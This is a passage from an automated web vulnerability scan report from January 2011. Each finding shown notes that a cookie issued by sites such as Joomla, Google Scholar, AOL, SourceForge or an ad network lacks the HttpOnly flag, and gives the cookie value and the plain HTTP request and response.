BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
49004778=_4d3df724,5208681003,772178^924994^87^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.552. http://rcm.amazon.com/e/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rcm.amazon.com
Path:	/e/cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.553. http://rd.apmebf.com/w/pg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rd.apmebf.com
Path:	/w/pg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 01:35:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.554. http://resources.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

041c772b92563f566daacce0f3f536ce=73c091fa2712ba7bf2c2185c73695000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.555. http://resources.joomla.org/directory/advsearch.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/directory/advsearch.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

041c772b92563f566daacce0f3f536ce=089d7ea1d8ba80fb168608272f1090c1; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directory/advsearch.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=089d7ea1d8ba80fb168608272f1090c1; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...

14.556. http://resources.joomla.org/directory/new.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/directory/new.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

041c772b92563f566daacce0f3f536ce=0b0ec261643fa10923bfbfaa489de5ba; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directory/new.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=0b0ec261643fa10923bfbfaa489de5ba; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...

14.557. http://resources.joomla.org/how-to-add-listings.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/how-to-add-listings.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

041c772b92563f566daacce0f3f536ce=d7fb4f14f3981668855c2cc50303ff38; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /how-to-add-listings.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=d7fb4f14f3981668855c2cc50303ff38; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...

14.558. http://scholar.google.com/schhp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/schhp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GSP=ID=b5f8ca2c9be5aa39; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
PREF=ID=b5f8ca2c9be5aa39:TM=1295884935:LM=1295884935:S=AsqWh3wvXaOvonOV; expires=Wed, 23-Jan-2013 16:02:15 GMT; path=/; domain=.google.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.559. http://scholar.google.com/scholar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/scholar

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GSP=ID=ba854cced93b2364; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
PREF=ID=ba854cced93b2364:TM=1295884936:LM=1295884936:S=HAc13nrthyumpJSW; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scholar?hl\x3den\x26tab\x3dws\x22 HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.560. http://search.aol.com/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.aol.com
Path:	/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

clickstreamid=-768582947549177520
TBS=prod:1295884937044:0; Domain=search.aol.com; Path=/
s_guid=297ca3792dae42bc82b64a0311d91529:240111; Domain=search.aol.com; Expires=Tue, 21-Feb-2012 16:02:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C HTTP/1.1
Host: search.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 406 Not Acceptable
Date: Mon, 24 Jan 2011 16:02:17 GMT
Set-Cookie: clickstreamid=-768582947549177520
Set-Cookie: TBS=prod:1295884937044:0; Domain=search.aol.com; Path=/
Set-Cookie: s_guid=297ca3792dae42bc82b64a0311d91529:240111; Domain=search.aol.com; Expires=Tue, 21-Feb-2012 16:02:17 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 1070
Keep-Alive: timeout=5, max=963
Connection: Keep-Alive

<html><head><title>Apache Tomcat/5.5.27 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

14.561. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

segments="3391|3392|30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.562. http://segment-pixel.invitemedia.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/unpixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

segments="3391|3392|30767|11262|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 22:20:55 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.563. https://sell.autotrader.com/syc/syc_center.jsf/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sell.autotrader.com
Path:	/syc/syc_center.jsf/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServersell=1753538570.47140.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /syc/syc_center.jsf/x22 HTTP/1.1
Host: sell.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.564. http://shop.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.joomla.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

7d9543e8bcda4746e859f8a307a0cf8b=f11faeaa8bfcf1173cca705e8a18bcf3; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=f11faeaa8bfcf1173cca705e8a18bcf3; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:26 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

14.565. http://shop.joomla.org/amazonca-bookstores.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.joomla.org
Path:	/amazonca-bookstores.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

7d9543e8bcda4746e859f8a307a0cf8b=6f4ba96b12412512286550c1c4e022c3; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amazonca-bookstores.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=6f4ba96b12412512286550c1c4e022c3; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

14.566. http://shop.joomla.org/amazoncom-bookstores.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.joomla.org
Path:	/amazoncom-bookstores.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

7d9543e8bcda4746e859f8a307a0cf8b=5d15bc9ea87fed1dc0557d8ce38f387c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amazoncom-bookstores.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=5d15bc9ea87fed1dc0557d8ce38f387c; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:26 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

14.567. http://shop.joomla.org/amazoncouk-bookstores.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.joomla.org
Path:	/amazoncouk-bookstores.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

7d9543e8bcda4746e859f8a307a0cf8b=f75616fa7408188c2fab0b8e14e1d941; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amazoncouk-bookstores.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=f75616fa7408188c2fab0b8e14e1d941; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:29 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

14.568. http://shop.joomla.org/amazonde-bookstores.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.joomla.org
Path:	/amazonde-bookstores.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

7d9543e8bcda4746e859f8a307a0cf8b=298c7bb388ae5200b47c09c683c7ea11; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amazonde-bookstores.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=298c7bb388ae5200b47c09c683c7ea11; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:29 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

14.569. http://shop.joomla.org/amazonfr-bookstores.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.joomla.org
Path:	/amazonfr-bookstores.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

7d9543e8bcda4746e859f8a307a0cf8b=9bb100633a131de24e6007e097496143; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amazonfr-bookstores.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=9bb100633a131de24e6007e097496143; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

14.570. http://shop.joomla.org/faqs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.joomla.org
Path:	/faqs.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

7d9543e8bcda4746e859f8a307a0cf8b=2bef4d635d7d090f5082a1fa1dbebd93; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faqs.html HTTP/1.1
Host: shop.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 7d9543e8bcda4746e859f8a307a0cf8b=2bef4d635d7d090f5082a1fa1dbebd93; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

14.571. http://shopping.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shopping.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=f1ebd483b2efcc03279de61bb3488d25; expires=Tue, 01-Feb-2011 13:16:01 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: shopping.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.572. http://simonwillison.net/2004/May/26/addLoadEvent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://simonwillison.net
Path:	/2004/May/26/addLoadEvent/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

openid="Set-Cookie: openid=; expires=Tue, 25-Jan-2011 13:16:05 GMT; Max-Age=0; Path=/;";

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2004/May/26/addLoadEvent/ HTTP/1.1
Host: simonwillison.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.573. http://smallbusinessnews.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smallbusinessnews.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=bd74cadd632dd88dd5215d3c753b762c; expires=Tue, 01-Feb-2011 13:16:10 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: smallbusinessnews.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.574. http://smp.specificmedia.com/smp/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smp.specificmedia.com
Path:	/smp/v=5

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

smu=5046.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.575. http://sourceforge.net/projects/nzbget/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/projects/nzbget/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sf.consume=8700121d2e69d73420eb7360565fa0b13958dd8dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMGViMTAwMGM2MXEKVQNfaWRxC1UgNzljMTAxOWFiMWI4MWUzOGJmOGZmM2ZjMGJkNzllMWZxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009ophg07FUOX2NyZWF0aW9uX3RpbWVxDkdB009ophg0EXUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/nzbget/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.576. http://sourceforge.net/projects/trn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/projects/trn/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sf.consume=9d302353afe3de71a0a2ec3d7914c1a46ba28173gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMTExYTAwMGFmMXEKVQNfaWRxC1UgMTkwODg5YjVhNTI4OWJkNDQ2OTE1ZGU4OGY3MDM4MmRxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009optJ41VUOX2NyZWF0aW9uX3RpbWVxDkdB009optJ4GHUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/trn/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.577. http://spongecell.com/api/events/915725/buy_tickets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spongecell.com
Path:	/api/events/915725/buy_tickets

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/events/915725/buy_tickets HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
Status: 500 Internal Server Error
Cache-Control: max-age=60
Content-Length: 23

No ticket url specified

14.578. http://spongecell.com/api/widgets/clickthrough/264001 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spongecell.com
Path:	/api/widgets/clickthrough/264001

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/widgets/clickthrough/264001 HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:17:47 GMT
Content-Type: text/html; charset=utf-8
Connection: close
